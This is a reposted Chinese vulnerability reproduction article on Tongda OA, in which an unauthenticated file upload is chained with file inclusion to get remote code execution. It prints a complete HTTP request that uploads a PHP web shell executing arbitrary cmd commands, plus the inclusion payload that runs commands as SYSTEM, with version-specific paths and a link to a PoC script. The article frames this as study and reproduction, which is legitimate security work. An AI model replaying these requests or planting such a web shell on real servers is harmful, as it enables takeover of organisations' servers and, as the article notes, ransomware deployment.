碼上快樂

相關內容    簡體    繁體

通達OA 任意文件上傳+文件包含導致RCE漏洞復現

本文轉載自   查看原文   2020-03-27 13:25   708 

0X00簡介

通達OA(Office Anywhere網絡智能辦公系統)是由北京通達信科科技有限公司自主研發的協同辦公自動化系統,包括流程審批、行政辦公、日常事務、數據統計分析、即時通訊、移動辦公等。

該漏洞被黑產利用,用於投放勒索病毒。在繞過身份驗證的情況下通過文件上傳漏洞上傳惡意php文件,組合文件包含漏洞最終造成遠程代碼執行漏洞,從而導致可以控制服務器system權限。

0X01漏洞概述

此漏洞是由未授權上傳和本地文件包含兩個漏洞組合而形成的rce漏洞文件上傳地址:http://localhost:801/ispirit/im/upload.php本地文件包含地址:http://localhost:801/ispirit/interface/gateway.php這個地址我看有的復現地址不一樣,是/mac/gateway.php,可能和操作系統有關,需要注意下

0X02漏洞影響版本

tongdaOA V11tangdaOA 2017tangdaOA 2016tangdaOA 2015tangdaOA 2013 增強版tangdaOA 2013

0X03環境搭建

下載地址:

鏈接:https://pan.baidu.com/s/1uFmGGvwiYgjxEXH5IQ9lJQ
提取碼:6qp9

安裝:將下載的exe下載安裝即可。(可以自定義端口,默認未80端口。)

安裝完成界面:

 

0X04漏洞復現

直接上傳:

訪問任意文件上傳漏洞路徑/ispirit/im/upload.php

使用Burp Suite抓包發送小馬數據包可以看到成功上傳

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:801
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

 

使用Burp Suite抓包發送,構造文件包含數據包並執行命令。


json={"url":"/general/../../attach/im/2003/815199247.jpg"}&cmd=whoami

 

命令執行成功,並且權限是system權限

注:有些版本gateway.php路徑不同

如2013:

/ ispirit/ im/ upload. php

/ ispirit/ interface/ gateway . php

2017:

/ispirit/ im/ upload. php / mac/ gateway. Php

本文使用的v11版本路徑為

/ispirit/im/upload.php

/ispirit/interface/gateway.php

0X05修復建議

更新官方補丁

http://www.tongda2000.com/news/673.php

也可以使用

0X06poc工具

https://github.com/fuhei/tongda_rce下載py腳本驗證,使用方法如下:

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 通達OA 任意文件上傳+文件包含導致RCE漏洞復現 通達OA 任意文件上傳+文件包含導致RCE 通達OA任意文件上傳+文件包含RCE漏洞復現(附自寫EXP) 通達OA任意文件上傳和文件包含漏洞導致RCE 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 最新通達OA11.6文件刪除+任意文件上傳rce漏洞復現 通達OA未授權文件上傳+文件包含RCE 復現 通達OA 文件上傳+任意文件包含 致遠OA任意文件上傳漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM